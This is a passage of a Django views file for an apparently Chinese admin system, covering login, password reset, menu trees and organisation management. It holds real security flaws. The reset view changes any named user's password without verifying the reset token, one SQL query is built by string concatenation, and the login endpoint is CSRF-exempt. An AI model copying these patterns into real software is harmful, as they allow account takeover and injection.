HttpResponse(0)\n\n\ndef getfun(myfunlist, fun):\n try:\n if (fun.pnode_id is not None):\n if fun not in myfunlist:\n childfun = {}\n if (fun.pnode_id != 1):\n myfunlist = getfun(myfunlist, fun.pnode)\n myfunlist.append(fun)\n except:\n pass\n return myfunlist\n\n\ndef childfun(myfun, funid):\n pisselected = False\n for fun in myfun:\n if str(fun[\"id\"]) == str(funid):\n fun[\"isselected\"] = True\n pisselected = True\n else:\n returnfuns = childfun(fun[\"child\"], funid)\n fun[\"isselected\"] = returnfuns[\"isselected\"]\n fun[\"child\"] = returnfuns[\"fun\"]\n if returnfuns[\"isselected\"]:\n pisselected = returnfuns[\"isselected\"]\n return {\"fun\": myfun, \"isselected\": pisselected}\n\n\ndef getpagefuns(funid, request):\n funlist = request.session['funlist']\n pagefuns = []\n mycurfun = {}\n message_task = []\n task_nums = 0\n\n for fun in funlist:\n if str(fun[\"id\"]) == str(funid):\n fun[\"isselected\"] = True\n else:\n returnfuns = childfun(fun[\"child\"], funid)\n fun[\"isselected\"] = returnfuns[\"isselected\"]\n fun[\"child\"] = returnfuns[\"fun\"]\n\n curfun = Fun.objects.filter(id=int(funid))\n if len(curfun) > 0:\n myurl = curfun[0].url\n jsurl = curfun[0].url # /falconstorswitch/24\n if myurl:\n myurl = myurl[:-1]\n jsurl = jsurl[1:-1]\n curjsurl = jsurl.split('/')\n jsurl = '/' + curjsurl[0]\n\n mycurfun = {\n \"id\": curfun[0].id, \"name\": curfun[0].name, \"url\": myurl, \"jsurl\": jsurl\n }\n\n return {\"pagefuns\": funlist, \"curfun\": mycurfun, \"task_nums\": task_nums}\n\n\ndef test(request):\n if request.user.is_authenticated() and request.session['isadmin']:\n errors = []\n code = \"DLZX_JYTJ_FDL_NJH\"\n ret = get_target_data_recently(code)\n return render(request, 'test.html',\n {'username': request.user.userinfo.fullname, 
\"errors\": errors})\n else:\n return HttpResponseRedirect(\"/login\")\n\ndef getchildfun(myfun,funlist):\n mychildfun = []\n funs = myfun.children.order_by(\"sort\").exclude(state=\"9\")\n\n for fun in funs:\n if fun in funlist:\n url = fun.url if fun.url else \"\"\n # if len(fun.app.all()) > 0:\n if fun.app:\n url = fun.url + str(fun.id) + \"/\" if fun.url else \"\"\n returnfuns = getchildfun(fun,funlist)\n mychildfun.append({\n \"id\": fun.id, \"name\": fun.name, \"url\": url, \"icon\": fun.icon,\n \"isselected\": False, \"child\": returnfuns[\"fun\"],\n \"new_window\": fun.if_new_wd,\n })\n return {\"fun\": mychildfun}\n\n\ndef custom_personal_fun_list(if_superuser, userinfo_id):\n funlist = []\n if if_superuser == 1:\n allfunlist = Fun.objects.all()\n for fun in allfunlist:\n funlist.append(fun)\n else:\n try:\n with connection.cursor() as cursor:\n cursor.execute(\n \"select datacenter_fun.id from datacenter_group,datacenter_fun,datacenter_userinfo,datacenter_userinfo_group,datacenter_group_fun \"\n \"where datacenter_group.id=datacenter_userinfo_group.group_id and datacenter_group.id=datacenter_group_fun.group_id and \"\n \"datacenter_group_fun.fun_id=datacenter_fun.id and datacenter_userinfo.id=datacenter_userinfo_group.userinfo_id and userinfo_id= \"\n + str(userinfo_id) + \" order by datacenter_fun.sort\"\n )\n\n rows = cursor.fetchall()\n for row in rows:\n try:\n fun = Fun.objects.get(id=row[0])\n funlist = getfun(funlist, fun)\n except:\n pass\n finally:\n connection.close()\n for index, value in enumerate(funlist):\n if value.sort is None:\n value.sort = 0\n funlist = sorted(funlist, key=lambda fun: fun.sort)\n\n pagefuns = []\n\n for fun in funlist:\n if fun.pnode_id == 1:\n url = fun.url if fun.url else \"\"\n url = fun.url if fun.url else \"\"\n # if len(fun.app.all()) > 0:\n if fun.app:\n url = fun.url + str(fun.id) + \"/\" if fun.url else \"\"\n returnfuns = getchildfun(fun,funlist)\n pagefuns.append({\n \"id\": fun.id, \"name\": fun.name, \"url\": url, \"icon\": fun.icon,\n \"isselected\": False, \"child\": returnfuns[\"fun\"],\n \"new_window\": fun.if_new_wd,\n })\n\n return pagefuns\n\n\ndef index(request, funid):\n if request.user.is_authenticated():\n request.session['funlist'] = custom_personal_fun_list(request.user.is_superuser, request.user.userinfo.id)\n # 右上角消息任务\n return render(request, \"index.html\",\n {'username': request.user.userinfo.fullname, \"homepage\": True,\n \"pagefuns\": getpagefuns(funid, request),\n })\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef login(request):\n \"\"\"\n @param login?error=n\n n=1 用户不存在\n n=2 用户认证失败\n \"\"\"\n error_tag = request.GET.get(\"error\", \"\")\n error = \"\"\n try:\n error_tag = int(error_tag)\n except Exception:\n pass\n\n if error_tag == 1:\n error = \"用户登录失败。\"\n if error_tag == 2:\n error = \"用户认证失败。\"\n\n auth.logout(request)\n try:\n del request.session['ispuser']\n del request.session['isadmin']\n except KeyError:\n pass\n return render(request, 'login.html', locals())\n\n\n@csrf_exempt\ndef ad_login(request):\n \"\"\"\n @return login?error=n\n n=1 用户不存在\n n=2 用户认证失败\n \"\"\"\n username = request.POST.get('username', '')\n password = request.POST.get('password', '')\n user = auth.authenticate(username=username, password=password)\n if user is not None and user.is_active:\n auth.login(request, user)\n if request.user.is_authenticated():\n request.session.set_expiry(0)\n usertype = user.userinfo.usertype\n if usertype == '1':\n request.session['ispuser'] = True\n else:\n request.session['ispuser'] 
= False\n request.session['isadmin'] = user.is_superuser\n return HttpResponseRedirect(\"/index\")\n else:\n return HttpResponseRedirect('/login?error=2')\n else:\n return HttpResponseRedirect('/login?error=1')\n\n\ndef userlogin(request):\n if request.method == 'POST':\n username = request.POST.get('username', '')\n password = request.POST.get('password', '')\n # 加入AD认证\n user = auth.authenticate(username=username, password=password)\n if user is not None and user.is_active:\n auth.login(request, user)\n myuserinfo = user.userinfo\n login_count = 0\n myuserinfo.login_count = login_count\n myuserinfo.retry_time = datetime.datetime.now()\n myuserinfo.save()\n if myuserinfo.forgetpassword:\n myuserinfo.forgetpassword = \"\"\n myuserinfo.save()\n if request.user.is_authenticated():\n if myuserinfo.state == \"0\":\n result = \"success1\"\n else:\n result = \"success\"\n if (request.POST.get('remember', '') != '1'):\n request.session.set_expiry(0)\n usertype = user.userinfo.usertype\n if usertype == '1':\n request.session['ispuser'] = True\n else:\n request.session['ispuser'] = False\n request.session['isadmin'] = user.is_superuser\n else:\n result = \"登录失败,请于客服联系。\"\n else:\n user = User.objects.get(username=username)\n login_count = user.userinfo.login_count if user.userinfo.login_count else 0\n if login_count < 4:\n login_count += 1\n user.userinfo.login_count = login_count\n user.userinfo.retry_time = datetime.datetime.now()\n user.userinfo.save()\n result = \"用户名或密码不正确。\"\n elif login_count == 5:\n retry_time = user.userinfo.retry_time\n now_time = datetime.datetime.now()\n mins = int((now_time - retry_time).total_seconds() / 60)\n if mins < 10:\n result = \"登录频繁,请于10分钟后登录。\"\n else:\n login_count = 1\n user.userinfo.login_count = login_count\n user.userinfo.retry_time = datetime.datetime.now()\n user.userinfo.save()\n result = \"用户名或密码不正确。\"\n else:\n user.userinfo.login_count = login_count + 1\n user.userinfo.retry_time = datetime.datetime.now()\n user.userinfo.save()\n result = \"登录频繁,请于10分钟后登录。\"\n login_count = login_count + 1\n return JsonResponse({\n 'res': result,\n 'login_count': login_count,\n })\n\n\ndef forgetPassword(request):\n if request.method == 'POST':\n result = \"\"\n email = request.POST.get('email', '')\n alluser = User.objects.filter(email=email)\n if (len(alluser) <= 0):\n result = u\"邮箱\" + email + u'不存在。'\n else:\n myuserinfo = alluser[0].userinfo\n url = str(uuid.uuid1())\n subject = u'密码重置'\n message = u'用户:' + alluser[0].username + u'您好。' \\\n + u\"\\n您在云灾备系统申请了密码重置,点击链接进入密码重置页面:\" \\\n + u\"http://127.0.0.1:8000/resetpassword/\" + url\n send_mail(subject, message, settings.EMAIL_HOST_USER,\n [alluser[0].email])\n myuserinfo.forgetpassword = url\n myuserinfo.save()\n result = \"邮件发送成功,请注意查收。\"\n return HttpResponse(result)\n\n\ndef resetpassword(request, offset):\n myuserinfo = UserInfo.objects.filter(forgetpassword=offset)\n if len(myuserinfo) > 0:\n myusername = myuserinfo[0].user.username\n return render(request, 'reset.html', {\"myusername\": myusername})\n else:\n return render(request, 'reset.html', {\"error\": True})\n\n\ndef reset(request):\n if request.method == 'POST':\n result = \"\"\n myusername = request.POST.get('username', '')\n password = request.POST.get('password', '')\n\n alluser = User.objects.filter(username=myusername)\n if (len(alluser) > 0):\n alluser[0].set_password(password)\n alluser[0].save()\n myuserinfo = alluser[0].userinfo\n myuserinfo.forgetpassword = \"\"\n myuserinfo.save()\n if myuserinfo.state == \"0\":\n result = 
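# Sketch: userlogin above throttles failed logins with login_count and
# retry_time on UserInfo -- roughly: five straight failures open a ten-minute
# lockout window, and a success resets the counter. The decision in isolation
# (constants as the code above uses them; a simplification of its branching):
import datetime

MAX_FAILURES = 5
LOCK_MINUTES = 10

def lockout_active(login_count, retry_time, now=None):
    now = now or datetime.datetime.now()
    if (login_count or 0) < MAX_FAILURES:
        return False
    minutes = (now - retry_time).total_seconds() / 60
    return minutes < LOCK_MINUTES  # once the window expires, counting restarts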
\"success1\"\n else:\n result = \"success\"\n auth.logout(request)\n user = auth.authenticate(username=myusername, password=password)\n if user is not None and user.is_active:\n auth.login(request, user)\n usertype = myuserinfo.type\n if usertype == '1':\n request.session['ispuser'] = True\n else:\n request.session['ispuser'] = False\n request.session['isadmin'] = alluser[0].is_superuser\n else:\n result = \"用户不存在。\"\n return HttpResponse(result)\n\n\ndef password(request):\n if request.user.is_authenticated():\n return render(request, 'password.html', {\"myusername\": request.user.username})\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef userpassword(request):\n if request.method == 'POST':\n result = \"\"\n username = request.POST.get('username', '')\n oldpassword = request.POST.get('oldpassword', '')\n password = request.POST.get('password', '')\n user = auth.authenticate(username=username, password=oldpassword)\n if user is not None and user.is_active:\n alluser = User.objects.filter(username=username)\n if (len(alluser) > 0):\n alluser[0].set_password(password)\n alluser[0].save()\n myuserinfo = alluser[0].userinfo\n myuserinfo.forgetpassword = \"\"\n myuserinfo.save()\n result = \"success\"\n auth.logout(request)\n user = auth.authenticate(username=username, password=password)\n if user is not None and user.is_active:\n auth.login(request, user)\n usertype = myuserinfo.type\n if usertype == '1':\n request.session['ispuser'] = True\n else:\n request.session['ispuser'] = False\n request.session['isadmin'] = alluser[0].is_superuser\n else:\n result = \"用户异常,修改密码失败。\"\n else:\n result = \"旧密码输入错误,请重新输入。\"\n\n return HttpResponse(result)\n\n\ndef get_fun_tree(parent, selectid, all_apps, all_nodes, all_works):\n nodes = []\n\n children = [child for child in all_nodes if child['pnode_id'] == parent['id']]\n for child in children:\n node = dict()\n node[\"text\"] = child['name']\n node[\"id\"] = child['id']\n node[\"type\"] = child['funtype']\n # app应用\n # 当前节点的所有外键\n current_app_id = child['app_id']\n\n app_select_list = [{\n \"app_name\": \"\",\n \"id\": \"\",\n \"app_state\": \"\",\n }]\n for app in all_apps:\n works = [{\n 'id': work['id'],\n 'name': work['name']\n } for work in all_works if work['app_id'] == app['id']]\n\n app_select_list.append({\n \"app_name\": app['name'],\n \"id\": app['id'],\n \"app_state\": \"selected\" if app['id'] == current_app_id else \"\",\n \"works\": str(works),\n })\n\n selected_work = child['work_id']\n\n node[\"data\"] = {\n \"url\": child['url'],\n \"icon\": child['icon'],\n \"pname\": parent['name'],\n \"app_list\": app_select_list,\n \"app_div_show\": True if child['funtype'] == \"fun\" else False,\n \"selected_work\": selected_work,\n \"new_window\": child[\"if_new_wd\"],\n }\n node[\"children\"] = get_fun_tree(child, selectid, all_apps, all_nodes, all_works)\n\n try:\n if int(selectid) == child['id']:\n node[\"state\"] = {\"selected\": True}\n except:\n pass\n nodes.append(node)\n return nodes\n\n\ndef function(request, funid):\n if request.user.is_authenticated():\n try:\n errors = []\n title = \"请选择功能\"\n selectid = \"\"\n id = \"\"\n pid = \"\"\n pname = \"\"\n name = \"\"\n mytype = \"\"\n url = \"\"\n icon = \"\"\n app_list = []\n pre_app_select_list = []\n works_select_list = []\n hiddendiv = \"hidden\"\n app_hidden_div = \"\"\n\n visited_url_div = \"\"\n new_window_div = \"\"\n\n all_apps = App.objects.exclude(state=\"9\").values()\n all_works = Work.objects.exclude(state='9').values('id', 'name', 'app_id')\n\n if request.method 
== 'POST':\n
                hiddendiv = \"\"\n
                id = request.POST.get('id')\n
                pid = request.POST.get('pid')\n
                pname = request.POST.get('pname')\n
                name = request.POST.get('name')\n
                mytype = request.POST.get('radio2')\n
                url = request.POST.get('url')\n
                icon = request.POST.get('icon')\n
                app = request.POST.get('app', '')\n
                works = request.POST.get('works', '')\n
                new_window = request.POST.get('new_window', '')\n
                try:\n
                    id = int(id)\n
                except:\n
                    raise Http404()\n
                try:\n
                    pid = int(pid)\n
                except:\n
                    raise Http404()\n
                if id == 0:\n
                    selectid = pid\n
                    title = \"新建\"\n
                else:\n
                    selectid = id\n
                    title = name\n\n
                try:\n
                    works = int(works)\n
                except:\n
                    pass\n\n
                if name.strip() == '':\n
                    errors.append('功能名称不能为空。')\n
                else:\n
                    try:\n
                        pfun = Fun.objects.get(id=pid)\n
                    except:\n
                        raise Http404()\n
                    try:\n
                        if id == 0:\n
                            sort = 1\n\n
                            try:\n
                                maxfun = Fun.objects.filter(\n
                                    pnode=pfun).latest('sort')\n
                                sort = maxfun.sort + 1\n
                            except:\n
                                pass\n
                            funsave = Fun()\n
                            funsave.pnode = pfun\n
                            funsave.name = name\n
                            funsave.funtype = mytype\n
                            funsave.url = url\n
                            funsave.icon = icon\n
                            funsave.sort = sort if sort else None\n
                            funsave.app_id = int(app) if app else None\n
                            funsave.work_id = works\n
                            funsave.if_new_wd = new_window\n
                            funsave.save()\n\n
                            title = name\n
                            id = funsave.id\n
                            selectid = id\n
                        else:\n
                            funsave = Fun.objects.get(id=id)\n
                            if funsave.funtype == \"node\" and mytype == \"fun\" and len(\n
                                    funsave.children.exclude(state=\"9\")) > 0:\n
                                errors.append('节点下还有其他节点或功能,无法修改为功能。')\n
                            elif mytype == \"node\" and funsave.app:\n
                                errors.append('功能下有关联应用,无法修改为节点。')\n
                            else:\n
                                funsave.name = name\n
                                funsave.funtype = mytype\n
                                funsave.url = url\n
                                funsave.icon = icon\n
                                funsave.app_id = int(app) if app else None\n
                                funsave.work_id = works\n
                                funsave.if_new_wd = new_window\n
                                funsave.save()\n\n
                                title = name\n
                            # after a save, rebuild app_select_list for the refreshed page\n
                            for c_app in all_apps:\n
                                pre_app_select_list.append({\n
                                    \"app_name\": c_app['name'],\n
                                    \"id\": c_app['id'],\n
                                    \"app_state\": \"selected\" if str(c_app['id']) == app else \"\",\n
                                })\n
                            # after a save, rebuild works_select_list as well\n
                            try:\n
                                select_app = App.objects.get(id=app)\n
                            except Exception as e:\n
                                pass\n
                            else:\n
                                works_list = select_app.work_set.exclude(state='9')\n
                                if works_list.exists():\n
                                    for work in works_list:\n
                                        if work.id == works:\n
                                            # selected\n
                                            works_select_list.append({\n
                                                'id': work.id,\n
                                                'name': work.name,\n
                                                'selected': 'selected'\n
                                            })\n
                                        else:\n
                                            works_select_list.append({\n
                                                'id': work.id,\n
                                                'name': work.name,\n
                                                'selected': ''\n
                                            })\n\n
                            if mytype == \"node\":\n
                                app_hidden_div = \"hidden\"\n
                                visited_url_div = \"hidden\"\n
                                new_window_div = \"hidden\"\n
                            else:\n
                                app_hidden_div = \"\"\n
                                visited_url_div = \"\"\n
                                new_window_div = \"\"\n\n
                            # refresh the cached funlist after a node change\n
                            request.session['funlist'] = custom_personal_fun_list(request.user.is_superuser, request.user.userinfo.id)\n
                    except Exception as e:\n
                        print(e)\n
                        errors.append('保存失败。')\n
            treedata = []\n\n
            all_nodes = Fun.objects.exclude(state='9').order_by('sort').values()\n
            rootnodes = [node for node in all_nodes if node['pnode_id'] is None]\n\n
            for rootnode in rootnodes:\n
                root = dict()\n
                root[\"text\"] = rootnode['name']\n
                root[\"id\"] = rootnode['id']\n
                root[\"type\"] = \"node\"\n\n
                # foreign keys of the current node\n
                current_app_id = rootnode['app_id']\n\n
                app_select_list = [{\n
                    \"app_name\": \"\",\n
                    \"id\": \"\",\n
                    \"app_state\": \"\",\n
                }]\n
                for app in all_apps:\n
                    works = [{\n
                        'id': work['id'],\n
                        'name': work['name']\n
                    } for work in all_works if work['app_id'] == app['id']]\n\n
                    app_select_list.append({\n
                        \"app_name\": app['name'],\n
                        \"id\": app['id'],\n
                        \"app_state\": \"selected\" if 
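# Sketch: the new-node branch above derives the next sort value with
# latest('sort') inside a try/except. An aggregate expresses the same thing
# without relying on the exception for the empty case:
from django.db.models import Max

def next_sort(pfun):
    top = Fun.objects.filter(pnode=pfun).aggregate(Max("sort"))["sort__max"]
    return (top or 0) + 1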
def fundel(request):
    if request.user.is_authenticated():
        if 'id' in request.POST:
            id = request.POST.get('id', '')
            try:
                id = int(id)
            except:
                raise Http404()
            allfun = Fun.objects.filter(id=id)
            if (len(allfun) > 0):
                sort = allfun[0].sort
                pfun = allfun[0].pnode
                allfun[0].delete()
                sortfuns = Fun.objects.filter(pnode=pfun).filter(sort__gt=sort)
                if len(sortfuns) > 0:
                    for sortfun in sortfuns:
                        try:
                            sortfun.sort = sortfun.sort - 1
                            sortfun.save()
                        except:
                            pass

                # refresh the cached right-hand menu after a delete
                request.session['funlist'] = custom_personal_fun_list(request.user.is_superuser, request.user.userinfo.id)
            return HttpResponse(1)
        else:
            return HttpResponse(0)


def funmove(request):
    if request.user.is_authenticated():
        if 'id' in request.POST:
            id = request.POST.get('id', '')
            parent = request.POST.get('parent', '')
            old_parent = request.POST.get('old_parent', '')
            position = request.POST.get('position', '')
            old_position = request.POST.get('old_position', '')
            try:
                id = int(id)
            except:
                raise Http404()
            try:
                parent = int(parent)
            except:
                raise Http404()
            try:
                position = int(position)
            except:
                raise Http404()
            try:
                # convert old_parent as well, so the comparison below is int vs int
                old_parent = int(old_parent)
            except:
                raise Http404()
            try:
                old_position = int(old_position)
            except:
                raise Http404()

            oldpfun = Fun.objects.get(id=old_parent)
            oldsort = old_position + 1
            oldfuns = Fun.objects.filter(
                pnode=oldpfun).filter(sort__gt=oldsort)

            pfun = Fun.objects.get(id=parent)
            sort = position + 1
            funs = Fun.objects.filter(pnode=pfun).filter(
                sort__gte=sort).exclude(id=id)

            if pfun.funtype == "fun":
                return HttpResponse("类型")
            else:
                if (len(oldfuns) > 0):
                    for oldfun in oldfuns:
                        try:
                            oldfun.sort = oldfun.sort - 1
                            oldfun.save()
                        except:
                            pass

                if (len(funs) > 0):
                    for fun in funs:
                        try:
                            fun.sort = fun.sort + 1
                            fun.save()
                        except:
                            pass
                myfun = Fun.objects.get(id=id)
                try:
                    myfun.pnode = pfun
                    myfun.sort = sort
                    myfun.save()
                except:
                    pass
                if parent != old_parent:
                    return HttpResponse(pfun.name + "^" + str(pfun.id))
                else:
                    return HttpResponse("0")


def 
get_org_tree(parent, selectid, allgroup):\n nodes = []\n children = parent.children.order_by(\"sort\").exclude(state=\"9\")\n for child in children:\n node = {}\n node[\"text\"] = child.fullname\n node[\"id\"] = child.id\n node[\"type\"] = child.usertype\n if child.usertype == \"org\":\n myallgroup = []\n for group in allgroup:\n myallgroup.append({\"groupname\": group.name, \"id\": group.id})\n node[\"data\"] = {\"remark\": child.remark,\n \"pname\": parent.fullname, \"myallgroup\": myallgroup}\n if child.usertype == \"user\":\n noselectgroup = []\n selectgroup = []\n allselectgroup = child.group.exclude(state=\"9\")\n for group in allgroup:\n if group in allselectgroup:\n selectgroup.append(\n {\"groupname\": group.name, \"id\": group.id})\n else:\n noselectgroup.append(\n {\"groupname\": group.name, \"id\": group.id})\n node[\"data\"] = {\"pname\": parent.fullname, \"username\": child.user.username, \"fullname\": child.fullname,\n \"phone\": child.phone, \"email\": child.user.email, \"noselectgroup\": noselectgroup,\n \"selectgroup\": selectgroup}\n node[\"children\"] = get_org_tree(child, selectid, allgroup)\n try:\n if int(selectid) == child.id:\n node[\"state\"] = {\"selected\": True}\n except:\n pass\n nodes.append(node)\n return nodes\n\n\ndef organization(request, funid):\n if request.user.is_authenticated():\n try:\n errors = []\n title = \"请选择组织\"\n selectid = \"\"\n id = \"\"\n pid = \"\"\n pname = \"\"\n noselectgroup = []\n selectgroup = []\n username = \"\"\n fullname = \"\"\n orgname = \"\"\n phone = \"\"\n email = \"\"\n password = \"\"\n mytype = \"\"\n remark = \"\"\n hiddendiv = \"hidden\"\n hiddenuser = \"hidden\"\n hiddenorg = \"hidden\"\n newpassword = \"hidden\"\n editpassword = \"\"\n\n allgroup = Group.objects.exclude(state=\"9\")\n if request.method == 'POST':\n hiddendiv = \"\"\n id = request.POST.get('id')\n pid = request.POST.get('pid')\n mytype = request.POST.get('mytype')\n try:\n id = int(id)\n except:\n raise Http404()\n try:\n pid = int(pid)\n except:\n raise Http404()\n\n if 'usersave' in request.POST:\n hiddenuser = \"\"\n hiddenorg = \"hidden\"\n grouplist = request.POST.getlist('source')\n noselectgroup = []\n selectgroup = []\n for group in allgroup:\n if str(group.id) in grouplist:\n selectgroup.append(\n {\"groupname\": group.name, \"id\": group.id})\n else:\n noselectgroup.append(\n {\"groupname\": group.name, \"id\": group.id})\n pname = request.POST.get('pname')\n username = request.POST.get('myusername', '')\n fullname = request.POST.get('fullname', '')\n phone = request.POST.get('phone', '')\n email = request.POST.get('email', '')\n password = request.POST.get('password', '')\n\n newpassword = \"\"\n editpassword = \"hidden\"\n\n if id == 0:\n selectid = pid\n title = \"新建\"\n alluser = User.objects.filter(\n username=username)\n if username.strip() == '':\n errors.append('用户名不能为空。')\n else:\n if password.strip() == '':\n errors.append('密码不能为空。')\n else:\n if fullname.strip() == '':\n errors.append('姓名不能为空。')\n else:\n if (len(alluser) > 0):\n errors.append(\n '用户名:' + username + '已存在。')\n else:\n try:\n newuser = User()\n newuser.username = username\n newuser.set_password(\n password)\n newuser.email = email\n newuser.save()\n # 用户扩展信息 profile\n profile = UserInfo() # e*************************\n profile.user_id = newuser.id\n profile.phone = phone\n profile.fullname = fullname\n\n try:\n porg = UserInfo.objects.get(\n id=pid)\n except:\n raise Http404()\n profile.pnode = porg\n profile.usertype = \"user\"\n sort = 1\n try:\n maxorg = 
UserInfo.objects.filter(
                                                pnode=porg).latest('sort')
                                            sort = maxorg.sort + 1
                                        except:
                                            pass
                                        profile.sort = sort
                                        profile.save()
                                        for group in grouplist:
                                            try:
                                                group = int(group)
                                                mygroup = allgroup.get(id=group)
                                                profile.group.add(mygroup)
                                            except ValueError:
                                                raise Http404()
                                        title = fullname
                                        selectid = profile.id
                                        id = profile.id
                                        newpassword = "hidden"
                                        editpassword = ""
                                    except ValueError:
                                        raise Http404()
                else:
                    selectid = id
                    title = fullname
                    exalluser = User.objects.filter(
                        username=username)
                    if username.strip() == '':
                        errors.append('用户名不能为空。')
                    else:
                        if fullname.strip() == '':
                            errors.append('姓名不能为空。')
                        else:
                            if (len(exalluser) > 0 and exalluser[0].userinfo.id != id):
                                errors.append(
                                    '用户名:' + username + '已存在。')
                            else:
                                try:
                                    alluserinfo = UserInfo.objects.get(
                                        id=id)
                                    alluser = alluserinfo.user
                                    alluser.email = email
                                    alluser.save()
                                    # extended user info (profile)
                                    alluserinfo.phone = phone
                                    alluserinfo.fullname = fullname

                                    alluserinfo.save()
                                    alluserinfo.group.clear()
                                    for group in grouplist:
                                        try:
                                            group = int(group)
                                            mygroup = allgroup.get(
                                                id=group)
                                            alluserinfo.group.add(
                                                mygroup)
                                        except ValueError:
                                            raise Http404()
                                    title = fullname
                                except:
                                    errors.append('保存失败。')
            else:
                if 'orgsave' in request.POST:
                    hiddenuser = "hidden"
                    hiddenorg = ""
                    pname = request.POST.get('orgpname')
                    orgname = request.POST.get('orgname', '')
                    remark = request.POST.get('remark', '')

                    if id == 0:
                        selectid = pid
                        title = "新建"
                        try:
                            porg = UserInfo.objects.get(id=pid)
                        except:
                            raise Http404()
                        allorg = UserInfo.objects.filter(
                            fullname=orgname, pnode=porg)
                        if orgname.strip() == '':
                            errors.append('组织名称不能为空。')
                        else:
                            if (len(allorg) > 0):
                                errors.append(orgname + '已存在。')
                            else:
                                try:
                                    # placeholder user: keeps the unique username index
                                    # on SQL Server from seeing duplicate empty values
                                    newuser = User()
                                    tmp_datetime = str(datetime.datetime.now())[-20:-1].encode('utf-8')
                                    newuser.username = base64.b64encode(tmp_datetime)  # mind the username column length
                                    newuser.password = ''
                                    newuser.email = ''
                                    newuser.is_active = 0
                                    newuser.is_staff = 0
                                    newuser.save()

                                    profile = UserInfo()  # e*************************
                                    profile.user = newuser
                                    profile.fullname = orgname
                                    profile.pnode = porg
                                    profile.remark = remark
                                    profile.usertype = "org"
                                    sort = 1
                                    try:
                                        maxorg = UserInfo.objects.filter(
                                            pnode=porg).latest('sort')
                                        sort = maxorg.sort + 1
                                    except:
                                        pass
                                    profile.sort = sort
                                    profile.save()
                                    title = orgname
                                    selectid = profile.id
                                    id = profile.id
                                except ValueError:
                                    raise Http404()
                    else:
                        selectid = id
                        title = orgname
                        try:
                            porg = UserInfo.objects.get(id=pid)
                        except:
                            raise Http404()
                        exalluser = UserInfo.objects.filter(
                            fullname=orgname, pnode=porg).exclude(state="9")
                        if orgname.strip() == '':
                            errors.append('组织名称不能为空。')
                        else:
                            if (len(exalluser) > 0 and exalluser[0].id != id):
                                errors.append(orgname + '已存在。')
                            else:
                                try:
                                    alluserinfo = UserInfo.objects.get(
                                        id=id)
                                    alluserinfo.fullname = orgname
                                    alluserinfo.remark = remark
                                    alluserinfo.save()
                                    title = orgname
                                except:
                                    errors.append('保存失败。')
            treedata = []
            rootnodes = UserInfo.objects.order_by("sort").exclude(
                state="9").filter(pnode=None, usertype="org")
            if len(rootnodes) > 0:
                for rootnode in rootnodes:
                    root = {}
                    root["text"] = rootnode.fullname
                    root["id"] = rootnode.id
                    root["type"] = "org"
                    myallgroup = []
                    for group in allgroup:
                        myallgroup.append(
                            {"groupname": group.name, "id": group.id})
                    root["data"] = {"remark": rootnode.remark,
                                    "pname": "无", "myallgroup": myallgroup}
                    try:
                        if int(selectid) == rootnode.id:
                            root["state"] = {"opened": True, "selected": True}
                        else:
                            root["state"] = {"opened": True}
                    except:
                        root["state"] = {"opened": True}
                    root["children"] = get_org_tree(
                        rootnode, selectid, allgroup)
                    treedata.append(root)
            treedata = json.dumps(treedata)
            return render(request, 'organization.html',
                          {'username': request.user.userinfo.fullname, 'errors': errors, "id": id, "orgname": orgname,
                           "pid": pid, "pname": pname, "fullname": fullname, "phone": phone, "myusername": username,
                           "email": email, "password": password, "noselectgroup": noselectgroup,
                           "selectgroup": selectgroup, "remark": remark, "title": title, "mytype": mytype,
                           "hiddenuser": hiddenuser, "hiddenorg": hiddenorg, "newpassword": newpassword,
                           "editpassword": editpassword, "hiddendiv": hiddendiv, "treedata": treedata,
                           "pagefuns": getpagefuns(funid, request)})

        except Exception as e:
            print(e)
            return HttpResponseRedirect("/index")
    else:
        return HttpResponseRedirect("/login")
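# ---------------------------------------------------------------------------
# Aside: the orgsave branch above backs every org node with an inactive
# placeholder User whose name is a base64-encoded timestamp, so the unique
# username index never collides on empty values. The same trick in isolation
# (helper names are hypothetical; datetime/base64 are assumed to be this
# module's existing imports; uuid4 is an alternative that avoids the slice
# arithmetic entirely):
import uuid

def placeholder_username():
    tmp_datetime = str(datetime.datetime.now())[-20:-1].encode('utf-8')
    return base64.b64encode(tmp_datetime)  # unique enough, opaque

def placeholder_username_uuid():
    return uuid.uuid4().hex[:30]  # fixed length, collision-resistant
# ---------------------------------------------------------------------------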
def orgdel(request):
    if request.user.is_authenticated():
        if 'id' in request.POST:
            id = request.POST.get('id', '')
            try:
                id = int(id)
            except:
                raise Http404()
            userinfo = UserInfo.objects.get(id=id)
            sort = userinfo.sort
            userinfo.state = "9"
            userinfo.sort = 9999
            userinfo.save()

            if userinfo.usertype == "user":
                user = userinfo.user
                user.is_active = 0
                user.save()

            userinfos = UserInfo.objects.filter(pnode=userinfo.pnode).filter(
                sort__gt=sort).exclude(state="9")
            if (len(userinfos) > 0):
                for myuserinfo in userinfos:
                    try:
                        myuserinfo.sort = myuserinfo.sort - 1
                        myuserinfo.save()
                    except:
                        pass

            return HttpResponse(1)
        else:
            return HttpResponse(0)


def orgmove(request):
    if request.user.is_authenticated():
        if 'id' in request.POST:
            id = request.POST.get('id', '')
            parent = request.POST.get('parent', '')
            old_parent = request.POST.get('old_parent', '')
            position = request.POST.get('position', '')
            old_position = request.POST.get('old_position', '')
            try:
                id = int(id)
            except:
                raise Http404()
            try:
                parent = int(parent)
            except:
                raise Http404()
            try:
                position = int(position)
            except:
                raise Http404()
            try:
                # convert old_parent as well, so the comparison below is int vs int
                old_parent = int(old_parent)
            except:
                raise Http404()
            try:
                old_position = int(old_position)
            except:
                raise Http404()
            oldpuserinfo = UserInfo.objects.get(id=old_parent)
            oldsort = old_position + 1
            olduserinfos = UserInfo.objects.filter(
                pnode=oldpuserinfo).filter(sort__gt=oldsort)

            puserinfo = UserInfo.objects.get(id=parent)
            sort = position + 1
            userinfos = UserInfo.objects.filter(pnode=puserinfo).filter(sort__gte=sort).exclude(id=id).exclude(
                state="9")

            myuserinfo = UserInfo.objects.get(id=id)
            if puserinfo.usertype == "user":
                return HttpResponse("类型")
            else:
                usersame = UserInfo.objects.filter(pnode=puserinfo).filter(fullname=myuserinfo.fullname).exclude(
                    id=id).exclude(state="9")
                if (len(usersame) > 0):
                    return HttpResponse("重名")
                else:
                    if (len(olduserinfos) > 0):
                        for olduserinfo in olduserinfos:
                            try:
                                olduserinfo.sort = olduserinfo.sort - 1
                                olduserinfo.save()
                            except:
                                pass
                    if (len(userinfos) > 0):
                        for userinfo in userinfos:
                            try:
